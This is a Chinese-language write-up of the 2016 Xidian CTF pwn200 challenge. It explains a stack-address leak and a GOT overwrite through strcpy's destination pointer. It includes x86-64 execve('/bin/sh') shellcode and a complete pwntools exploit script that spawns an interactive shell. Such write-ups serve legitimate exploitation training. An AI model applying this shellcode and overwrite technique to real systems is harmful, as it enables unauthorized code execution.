简介 :
2016 西电 CTF 线上赛 pwn200
分析 :
首先该题目没有开启 NX 保护 , 也就是有可能需要将 shellcode 写入到栈上
该题目需要进行两次溢出
1. 第一次溢出可以 leak 出 main 函数的栈底地址 , 这样可以得到我们写入的 shellcode 的地址
2. 第二次溢出可以覆盖 strcpy 的 dest 参数指针 , 达到任意地址写的目的
pwn200》](http://ddrvcn.oss-cn-hangzhou.aliyuncs.com/2019/5/YZzyii.png)
Paste_Image.png
pwn200》](http://ddrvcn.oss-cn-hangzhou.aliyuncs.com/2019/5/Vj6fUr.png)
Paste_Image.png
pwn200》](http://ddrvcn.oss-cn-hangzhou.aliyuncs.com/2019/5/326NZb.png)
Paste_Image.png
利用代码 :
global _start
_start:
mul esi
push rax
mov rdi, "/bin//sh"
push rdi
mov rdi, rsp
mov al, 59
syscall
#!/usr/bin/env python
# coding:utf-8
import pwn
import binascii
shellcode = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
Io = pwn.process("./pwn200")
# concat the string
print Io.recvline()
Io.send(shellcode + "\xcc" * (0x30 - len(shellcode)))
main_rbp_addr = pwn.u64(Io.readline()[48:48+6] + "\x00\x00")
print "[+] rbp (main) : %s" % (hex(main_rbp_addr))
main_stack_size = 0x10
address_size = 0x08
input_name_rbp_addr = main_rbp_addr - main_stack_size - address_size * 2
print "[+] rbp (input_name) : %s" % (hex(input_name_rbp_addr))
input_name_stack_size = 0x40
input_money_rbp_addr = input_name_rbp_addr - input_name_stack_size - 0x10 - 0x10
print "[+] rbp (input_money) : %s" % (hex(input_money_rbp_addr))
# send id
Io.sendline("1")
print Io.readline()
print Io.readline()
# send money
buffer_size = 0x40
printf_got = pwn.p64(0x602030)
shellcode_addr = pwn.p64(input_name_rbp_addr - 0x30)
payload = shellcode_addr + "\x00" * (buffer_size - address_size * 2) + printf_got
print "[+] [LENGTH] : %d" % (len(payload))
with open("payload.dat", "w") as f:
f.write(payload)
# send payload
Io.send(payload)
Io.interactive()
知识储备 :
编写shellcode
函数调用的栈帧变换
64位程序的用户空间的地址用 6 字节表示
